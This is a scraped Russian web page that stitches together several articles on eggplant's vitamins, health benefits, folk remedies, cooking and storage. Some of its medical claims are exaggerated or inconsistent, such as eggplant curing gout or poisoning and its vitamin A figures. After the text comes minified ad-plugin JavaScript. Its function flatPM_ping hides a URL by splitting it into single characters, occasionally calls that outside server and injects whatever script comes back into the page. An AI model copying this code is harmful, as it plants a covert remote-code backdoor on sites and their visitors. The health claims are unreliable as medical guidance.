8 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Витамины в баклажане

Чем полезен Баклажан?

Баклажаны — необычные овощи, имеющие незабываемый вкус и уникальный набор полезных для здоровья свойств. Родиной этого удивительного овоща является Индия, где он долгое время произрастал в качестве дикого растения, но уже в средневековье, он нашел распространение в кулинарии.

Овощная культура баклажан имеет фиолетовые плоды, но современные ученые в результате различных смешиваний и операций, получили баклажаны самых разных цветов, размеров и форм – белые и черные, желтые или коричневые, маленькие и большие, цилиндрической и грушевидной формы. Единственно, что объединяет все сорта баклажана — это нежная мякоть, имеющая незабываемый вкус, структуру и целебные свойства.

Состав баклажана

Замечательным преимуществом баклажанов является наличие в их составе большого числа витаминов, минеральных и питательных веществ. Баклажаны – богаты на витамин С, К, В6, тиамин, ниацин, магний, фосфор, медь, пищевые волокна, фолиевую кислоту, калий и марганец. Он также практически не содержит холестерина и насыщенных жиров.

В 100 г мякоти баклажан содержатся следующие вещества:

Наименование

Количество

Суточная потребность

Медь 0.082 мг 9%
Железо 0.24 мг 3%
Марганец 0.250 мг 11%
Цинк 0.16 мг 1%
Йод 2 мкг 1,3 %
Фтор 14 мкг 0,4 %
Молибден 10 мкг 14,3 %
Бор 0,1 мг 5 %
Кобальт 1 мкг 10 %

1%
Магний 14 мг 3,5%
Калий 230 мг 5%
Натрий 6 мг 0,5%
Сера 15 мг 1,5 %
Фосфор 34 мг 4,3 %
Хлор 47 мг 2 %

5.5%
Витамин РР 0.649 мг 4%
Витамин В5 0.281 мг 6%
Витамин В6 0.084 мг 6.5%
Витамин В2 0.037 мг 3%
Витамин В1 0.039 мг 3%
Витамин А 27 мкг 1%
Витамин C 2.2 мг 3.5%
Витамин Е 0.30 мг 2%
Витамин K 3.5 мкг 3%

1%
Углеводы 5,7 г 4%
Белка 1 г 2%
Общее количество жира 0,19 г 1%
Холестерин 0 мг 0%
Пищевые волокна 3.40 г 9%

12 полезных свойств баклажанов

Здоровое пищеварение

Баклажаны, как и многие другие овощи, являются отличными источниками пищевых волокон, что делает его обязательным продуктом любой сбалансированной диеты. Клетчатка дарит здоровье желудочно-кишечному тракту, а также улучшает перистальтику кишечника. Это свойство баклажан находит применение в лечении запоров и других кишечных расстройств. К тому же клетчатка стимулирует секрецию желудочного сока, что способствует лучшему усвоению питательных веществ и переработке пищевых продуктов.

Здоровое сердце и сосуды

Пищевые волокна, витамин С, калий и магний снижают риск развития сердечных заболеваний, устраняя «плохой холестерин», который может закупоривать артерии и вены и вызывать атеросклероз, инфаркт и инсульт. А биофлавоноиды в составе баклажанов прекрасно подходят для снижения кровяного давления, что сокращает напряжение и нагрузку на сердечно-сосудистую систему, значительно улучшая здоровье сердца, ведь не случайно баклажаны еще называют «овощем долголетия».

Снижение веса

Баклажаны практически не содержат жиров и холестерина, поэтому врачи-диетологи считают их абсолютно здоровой пищей для людей, пытающихся сбросить вес или борющихся с его излишками. Клетчатка делает баклажаны достаточно сытным продуктом благодаря ингибированию особого гормона грелина, который отвечает за чувство голода. Это способствует снижению аппетита, рисков переедания и соответственно обеспечивает потерю веса.

Профилактика онкологических заболеваний

Баклажаны богаты на антиоксиданты, являющихся одними из лучших защитных веществ от свободных радикалов. Витамин С, содержащиеся в баклажанах, является основным компонентом, дающим здоровье иммунной системе, так как стимулирует выработку и активность белых кровяных клеток. Кроме того, баклажаны содержат марганец, природный антиоксидант и незаменимый минеральный компонент. И, наконец, главной визитной карточкой баклажанов являются флавоноид насунин и хлорогеновая кислота, которые проявляют противовирусные, антибактериальные и отличные ингибирующие свойства в отношении свободных радикалов.

Здоровая нервная система

Антиоксидант насунин, являющийся антоцианом, убивает свободные радикалы, отвечающие за нейронную дегенерацию и возникновение болезни Альцгеймера и деменции. Также фитонутриенты, содержащиеся в баклажанах, давно известны как ускорители познавательной деятельности, улучшающие при этом и общее психическое здоровье. Они не только защищают от активных свободных радикалов, но также увеличивают приток крови к мозгу. Благодаря этому укрепляются нейронные связи, улучшается память и способность к аналитическому мышлению.

Здоровые кости

Баклажаны являются весьма полезным продуктом для людей, попадающих в группу риска по развитию костной деструкции и остеопороза. Фенольные соединения, содержащиеся в этом овоще, как раз способны уменьшать признаки остеопороза, укреплять и увеличивать плотность костной ткани. Баклажаны также имеют значительные количества железа, калия и кальция, которые являются неотъемлемыми веществами для здоровья и прочности костей.

Здоровье кровеносной системы

Дефицит железа может вызвать очень опасное для здоровья человека заболевание – анемию, которая имеет неприятные симптомы: характерные головные боли и мигрень, усталость, слабость, депрессия, когнитивные и неисправности. Пища с высоким содержанием железа признана бороться с малокровием, а в баклажанах железа содержится достаточное количество. Баклажаны также очень богаты медью, другим важным компонентом для образования красных кровяных клеток – эритроцитов.

Управление сахарным диабетом

Благодаря высокому содержанию клетчатки и низкому количеству растворимых углеводов, баклажаны являются идеальным питанием для людей, страдающих сахарным диабетом. Полезные вещества в составе этого овоща способны регулировать уровень глюкозы в крови и активность инсулина в организме, что помогает избежать опасные побочные эффекты болезни.

Здоровая беременность и роды

Фолиевая кислота является витамином, особенно полезным для беременных женщин. Это вещество защищает младенцев от развития дефектов нервной трубки, приводящей к серьезным последствиям.

Здоровые волосы, кожа и ногти

Из-за высокого содержания воды, витаминов, минералов, а также полезных жиров в баклажанах они помогают сохранить волосы сильными и здоровыми, а также избавить ногти от хрупкости и слоистости и придать коже сияющий, нежный и хорошо увлажненный вид.

Здоровый сон

Используя печеный баклажан совместно с медом перед сном, поможет избавиться от бессонницы. Кроме того, витамины группы В помогут расслабиться от умственной и физической нагрузки, что также сделает сон здоровым.

Улучшение работы мочевыделительной системы

Баклажаны полезны при подагре, так как вместе с мочой они способствуют выведению солей мочевой кислоты из организма, что уменьшает риск их отложения костях, суставах, а также служит профилактикой развития мочекаменной болезни почек. Также баклажаны способствуют выведению алкоголя из организма, а при отравлениях различными грибами и ягодами он отлично выводит опасные токсины.

Противопоказания к употреблению баклажана

Полезные свойства баклажана не избавляют этот овощ от наличия достаточно опасных проявлений, связанных с его употреблением. Их важно знать, для того, чтобы случайный недуг не застал врасплох и неподготовленными.

  • перезревшие плоды баклажана богаты на ядовитое для человеческого организма вещество – соланин, отравление которым приводит к коликам, судорогам, диарее, головокружению;
  • избыточное количество пищевых волокон может быть вредным при гастрите, язвенной болезни, желудочных и кишечных расстройствах, заболеваниях почек;
  • баклажаны дают кальцию усваиваться в организме, поэтому людям, страдающим от нехватки этого макроэлемента, стоит ограничить употребление этой овощной культуры;
  • не стоит долго хранить баклажаны, так как в нем начинают накапливаться токсины, вызывающие галлюцинации и неадекватное поведение. Не зря предки прозвали овощ «безумным яблоком».

Интересные факты о баклажане

Мало кто знает, но баклажан – это не овощ, а ягода, так как ближайшими родственниками этой культуры являются картофель и томаты.

У баклажанов есть множество названий. На Украине эти овощи известны как синенькие, в восточных странах их называют бадриджан или бубриджан, иногда баклажан называют «армянским огурцом», а азербайджанцы называют «демьянками».

В Японии считается удачным и счастливым увидеть в первом сне нового года гору Фудзи, орла и баклажан.



Чем полезны баклажаны

Баклажан – особенный продукт, который используется не только в кулинарных, но и в лечебных целях. Гипертония, патологии ЖКТ, подагра, болезни сердца и сосудов – овощ способствует успешному лечению этих и многих других заболеваний. В чем польза и вред баклажанов, как их правильно употреблять и вкусно готовить – рассмотрим эти вопросы подробнее.

Что это за овощ

Баклажан – это растение семейства Пасленовых. Грушевидный или цилиндрический плод на самом деле является ягодой, хотя в кулинарном смысле привычно считать его овощем. Плоды меняют цвет в зависимости от степени зрелости – от светло-лилового до насыщенного фиолетового. Есть особый сорт растения, молодые плоды которого имеют молочно-белую окраску, а более зрелые – золотистую.

Химический состав и калорийность баклажанов

В состав баклажана входит множество макро- и микроэлементов, среди которых:

Также в этой необычной ягоде содержатся антоцианы – это вещества, оказывающие профилактическое и защитное действие. В состав его входит и полезная для пищеварения клетчатка.

Калорийность баклажана невелика – всего 24 ккал на 100 г продукта. В овоще содержится 1,2 г белка, 0,1 г жиров и 4,5 г углеводов.

Какие витамины содержатся в баклажанах

Овощ отличается и разнообразием витаминного состава. В него входят витамины группы B, витамины PP, C, бета-каротин. Такое богатое содержание витаминов, макро- и микроэлементов и объясняет полезные свойства баклажанов.

Польза баклажанов для организма

Вкусный и полезный овощ помогает при профилактике и лечении множества заболеваний. Его рекомендуется употреблять в следующих случаях:

  1. При болезнях, связанных с работой сердца и сосудов. Благодаря высокому содержанию калия овощ способствует укреплению стенок сосудов и сердечной мышцы.
  2. Для профилактики простудных заболеваний – не заболеть поможет витамин С в составе.
  3. Для стабилизации работы нервной системы.
  4. При реабилитации после инфаркта и инсульта – восстановиться помогут цинк и марганец.
  5. При бессоннице и стрессе.
  6. Для повышения уровня гемоглобина – в этом случае с проблемой помогает справиться железо.
  7. Для быстрого заживления ран – овощ обладает регенерирующим свойством.

В основном полезными свойствами обладают более молодые плоды. Перезрелые овощи содержат избыточное количество соланина. В больших дозах этот токсин причиняет серьезный вред организму.

Для мужчин

Статистика показывает, что мужская половина населения наиболее подвержена риску сердечно-сосудистых заболеваний. Поэтому мужчинам в особенности рекомендуется употреблять баклажаны для профилактики атеросклероза, ишемической болезни сердца и других патологий.

Для женщин

Благодаря высокому содержанию марганца овощ особенно полезен женщинам во время предменструального синдрома и климакса. Его употребление поможет смягчить нестабильность настроения, снимет раздражительность.

Для похудения

Невысокая энергетическая ценность делает продукт одним из необходимых ингредиентов для диетических блюд. Фолиевая кислота в его составе помогает вывести воду, а клетчатка поддерживает чувство сытости, что в совокупности также помогает снизить вес.

Польза и вред баклажанов при беременности

Употреблять баклажаны во время беременности можно и полезно. Продукт не перегружает организм, но восполняет нехватку необходимых при вынашивании витаминов и макроэлементов. Также овощ полезен для избавления от отеков, часто беспокоящих женщин во время беременности.

Полезными будут отварные или приготовленные на пару овощи, а вот от жареных и консервированных продуктов стоит отказаться.

Можно ли баклажаны при грудном вскармливании

При отсутствии противопоказаний кормящей маме баклажаны принесут только пользу. Они помогут разнообразить рацион и восстановиться после родов. Однако употреблять овощ рекомендуется не раньше чем через 4 месяца после рождения ребенка. Если же баклажаны входили в меню мамы и при беременности, то начинать их есть можно и при достижении малышом 2-месячного возраста.

В первый раз рекомендуется съесть небольшой кусочек утром, чтобы проверить реакцию грудничка. Если в течение 2 суток самочувствие малыша не ухудшилось, то порцию можно увеличивать.

Баклажаны детям

Растущий организм нуждается в питательных веществах, которые полезны для развития мозга, нервной системы, а также защиты от простуд. Но с какого возраста баклажаны можно давать ребенку? Врачи не рекомендуют включать овощ в рацион детей до 3 лет. Пищеварительная система ребенка этого возраста еще не готова к перевариванию этого продукта. Детям постарше он будет полезен при условии правильного приготовления – благотворное влияние на детский организм оказывают вареные, приготовленные на пару или тушеные овощи.

Применение баклажанов в народной медицине

Лечебные свойства баклажана широко используются в народной медицине. Внутреннее и наружное применение средств из овоща станет хорошей альтернативой аптечным медикаментам.

Использование кожуры

При гипертонии будет полезна высушенная кожура плода. Ее следует измельчить в кофемолке и принимать по 1 ч. л. в день перед едой. Это же средство предотвращает воспаление десен и укрепляет зубы. Для полосканий 1 ч. л. порошка нужно залить кипятком и добавить 1 ч. л. соли.

Настой

Настой из овоща выводит из организма желчь. Чтобы приготовить средство, баклажан следует нарезать кубиками, залить 200 мл кипятка и поместить на водяную баню на 30 минут. Далее настой следует процедить и принимать по половине стакана каждый день перед едой.

Баклажанный сок

Сок из баклажана обладает антибактериальным действием. Чтобы его приготовить, нужно очистить овощ, натереть его на терке и отжать. Пить средство рекомендуется по половине стакана трижды в день. Такой сок поможет и для быстрого заживления порезов и ссадин.

Особенности употребления баклажана при различных заболеваниях

Овощ полезен практически в любом виде, но в некоторых случаях важно соблюдать специальные правила приготовления. Особенно это нужно иметь в виду при наличии ряда заболеваний.

При диабете

В меню пациентов с сахарным диабетом должны входить вареные или приготовленные на пару плоды. Особенно полезна при диабете кожура овоща – ее рекомендуется натирать и принимать перед едой в течение месяца.

При панкреатите

Во время острого воспаления употреблять баклажаны строго запрещено. В период стойкой ремиссии разрешается постепенно вводить овощ в рацион, предпочтительно – в составе овощных супов. Через несколько месяцев после приступа и при хорошем самочувствии можно употреблять продукт в запеченном или тушеном виде.

При гастрите

При гастрите баклажаны обязательно нужно подвергать термической обработке – недоваренные овощи могут травмировать слизистую оболочку желудка. Рекомендуется соблюдать установленную норму употребления – не более 200 г в день.

При холецистите

При этом заболевании, как и при панкреатите, есть эти овощи можно только в период ремиссии. От жареных блюд, а также от использования острых приправ, майонеза и кетчупа стоит отказаться.

При подагре

С выведением мочевой кислоты при подагре хорошо справляются сок и настой из овоща. Можно употреблять блюда с более приятными вкусовыми качествами – отмечается польза баклажанной икры, овощного рагу и супов.

Применение баклажанов в косметологии

Употребление баклажана способствует выработке коллагена, благодаря которому кожа становится упругой и здоровой. Мякоть сырого плода используется для оздоровления и омолаживания кожи:

  1. Для избавления от морщин мякоть можно смешать с соком алоэ.
  2. Справиться с жирностью поможет мякоть овоща, смешанная с кефиром.
  3. Маска из натертого баклажана, яичного желтка и сметаны – хорошее средство против сухости.

Маски наносят на лицо на 15-20 минут и смывают теплой водой.

Как вкусно приготовить баклажаны

Что можно приготовить из баклажана, чтобы оценить его вкусовые качества? Овощ можно использовать как самостоятельное блюдо и как ингредиент в составе других блюд:

  1. Баклажан хорошо сочетается с другими овощами – перцем, картофелем, кабачками. Поэтому вкусным и полезным блюдом будет овощное рагу.
  2. Также можно приготовить рулетики с начинками на любой вкус – фаршируют баклажаны сыром, помидорами, орехами.
  3. Баклажаны могут входить в состав соусов и овощных заправок.
  4. Для вегетарианского меню отлично подойдут котлеты и запеканки с полезным овощем.

Печеный баклажан полезен больше, чем жареный. При жарке он впитывает очень много масла.

Вопрос о том, нужно ли снимать кожу с баклажанов, зависит от самого блюда. Жареный баклажан с золотистой корочкой сохранит структуру и без кожицы, а вот запеченные или тушеные овощи лучше держат форму при наличии кожуры.

Как убрать горечь из баклажанов

Чтобы овощ не был горьким, его нужно нарезать и замочить в подсоленной воде. Через полчаса дольки следует промыть и можно приступать к готовке – теперь вкус блюда не будет испорчен горечью.

Суточная норма употребления баклажанов

Молодые плоды можно употреблять в любых количествах – они вряд ли нанесут организму вред. При заболеваниях ЖКТ норму уже стоит обсудить со специалистом – обычно она составляет не более 200 г в день даже в период ремиссии.

Как выбрать баклажаны

При выборе стоит ориентироваться на молодые плоды. Они небольшие, их длина – 10-15 см.

Кожура вкусного плода темная, блестящая, сам плод узкий и продолговатый, семян в нем немного. На ощупь овощ должен быть упругим, а его кожура – ровной, без повреждений. Также свежие и полезные плоды не имеют неприятного запаха. У переспелого плода несвежая, сухая плодоножка и много семян внутри. Такие плоды могут нанести вред организму.

Как правильно хранить баклажаны в домашних условиях

Плоды необходимо хранить в холодильнике, так как при комнатной температуре срок их хранения не превышает 2 дней. Но и в холодильнике при температуре 1-2 °C овощи нужно защищать от света плотной тканью. В таких условиях срок их хранения достигает одного месяца.

Также овощи можно заморозить на зиму. Для этого их нарезают колечками или кубиками, бланшируют и погружают в холодную воду. Далее баклажан нужно обсушить, положить в полиэтиленовый пакет и убрать в морозилку.

Вред баклажанов и противопоказания

Самое важное, что стоит помнить о вреде продукта, – это наличие соланина в перезрелых плодах. Именно поэтому выбирать нужно только молодые овощи. Распознать отравление соланином можно по следующим симптомам:

Однако даже молодые плоды могут нанести вред в следующих случаях:

  1. Чрезмерное употребление низкоуглеводных баклажанов при сахарном диабете грозит развитием гипогликемии.
  2. Баклажаны, особенно в сыром и жареном виде, наиболее вредны при обострениях заболеваний ЖКТ.
  3. Жареные овощи впитывают канцерогены, которые выделяются из масла в процессе приготовления, поэтому такое блюдо принесет больше вреда, чем пользы.

Таким образом, возможный вред в основном зависит от степени зрелости плода, способа приготовления и наличия заболеваний, при которых употребление овоща противопоказано.

Заключение

Польза и вред баклажана зависят от индивидуальных особенностей: возраста, состояния здоровья и вкусовых предпочтений. Однако в большинстве случаев этот овощ принесет организму только пользу благодаря особому химическому составу. Тем не менее, важно помнить о рекомендациях по выбору свежего и качественного плода, а также способах приготовления, делающих овощ еще полезнее.

Витамины в баклажане

Баклажан — овощ фиолетового цвета, имеющий необычную расцветку и вкус. Витамины в баклажане содержатся в большом количестве, они оказывают лечебное воздействие на человеческий организм.

Витамины в баклажане

Особенности баклажана

Баклажан относится к семейству пасленовых. Его родина — Восточная Индия. После попадания в Европу местным жителям вкус овоща не понравился, овощ применяли для лечения заболеваний.

Лечебные свойства

Плод зарекомендовал себя, благодаря лечебным свойствам:

  • отваренный в масле баклажан помогает при боли зубов;
  • овощной сок спасает от подагры.

Благодаря полезным свойствам и составу, баклажан:

  • положительно влияет на людей, страдающих от сахарного диабета;
  • за счет клетчатки оказывает слабительное действие;
  • обеспечивает белком;
  • нормализует циркуляцию крови в почках;
  • оказывает мочегонное воздействие, предотвращает отечность.

Обработка овоща

Перед употреблением овощи обрабатывают. Для удаления горечи и сохранения витаминов нарезанные плоды подсаливают и оставляют на 30 мин., после этого сливают сок и промывают продукт под водой. Для зимнего хранения овощи замораживают: при этом сохраняются полезные свойства.

Витамины и минералы в баклажане

Содержание витаминов и минералов в овоще небольшое, но их уникальный состав положительно влияет на человеческий организм.

100 г овоща содержит следующие витамины:

  • А либо ретинол (3 мг). Он влияет на зрение, поддерживает состояния кожи.
  • В2 либо рибофлавин (0,05 мг). Если его не хватает, наступает боязнь света, прекращается рост.
  • В3 либо ниацин (0,6 мг). Он отвечает за кровообращение и работу сердца.
  • Аскорбиновая кислота либо С (5 мг). При его нехватке развивается слабость, организм устает, иммунитет слабеет.
  • В6 либо пиридоксин (0,2 мг). Он участвует в обмене аминокислот и холестерина.

Овощ полезен для организма

Фолиевая кислота либо В9 (0,018 мг). Помогает бороться с анемией, заболеваниями кожи, защищает сердце от ишемии.

  • Е либо токоферол (0,3 мг). Он влияет на работу кровеносной системы, не допускает развитие болезни Альцгеймера, укрепляет оболочки клеток.

В состав баклажана входит ряд микроэлементов:

  • магний — 9 мг;
  • натрий — 6 мг;
  • кальций — 15 мг;
  • калий — 230 мг;
  • сера — 15 мг;
  • фосфор — 34 мг.

Овощ благотворно влияет на людей с проблемами сердечно-сосудистой системы.

Чем помогает человеку

Баклажан, благодаря своему составу оказывает помощь организму:

  • Укрепляет кости. Фенольные соединения помогают в борьбе с остеопорозом, костная ткань становится крепче.
  • Улучшает работу кровеносной системы. Содержание в овоще железа и меди влияет на участие в формировании эритроцитов и повышение гемоглобина.
  • Помогает при диабете. Баклажан включен в рацион людей с данным диагнозом, благодаря малому числу углеводов и содержанию клетчатки.
  • Помогает при подагре. Мочегонные свойства овоща стимулируют выведение солей мочевой кислоты, уменьшению отложений в костях.
  • Помогает при отравлениях плохой едой и алкоголем. Выводит токсины;
  • Приносит пользу сосудам и сердцу. Благодаря калию и магнию, снижается холестерин, влияющий на образование тромбов в сосудах, это предотвращает развитие инфаркта и инсульта.
  • Обеспечивает здоровое состояние волос и ногтей.
  • Испульзуется как профилактика рака. Антиоксиданты баклажана оберегают человека от свободных радикалов.
  • Обеспечивает крепкий сон. Запеченный баклажан с медом снимает нагрузку.

Баклажан помогает отказаться от зависимости курения. В нем содержится никотиновая кислота, она вызывает чувство отвращения к табаку.

Использование овоща при похудении

Диета с фиолетовым овощем помогает избавиться от 3-6 кг за месяц. На ужин готовят блюдо из баклажана: запекают, тушат, готовят на пару. При этом сохраняются все витамины и минералы. При добавлении овоща в обеденное меню процесс похудения дает лучшие результаты.

В составе овоща содержится много воды и мало калорий. Он является белковым продуктом. Калий влияет на мочегонную функцию, клетчатка помогает бороться с запорами.

Витамины и минералы, которыми богат баклажан

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};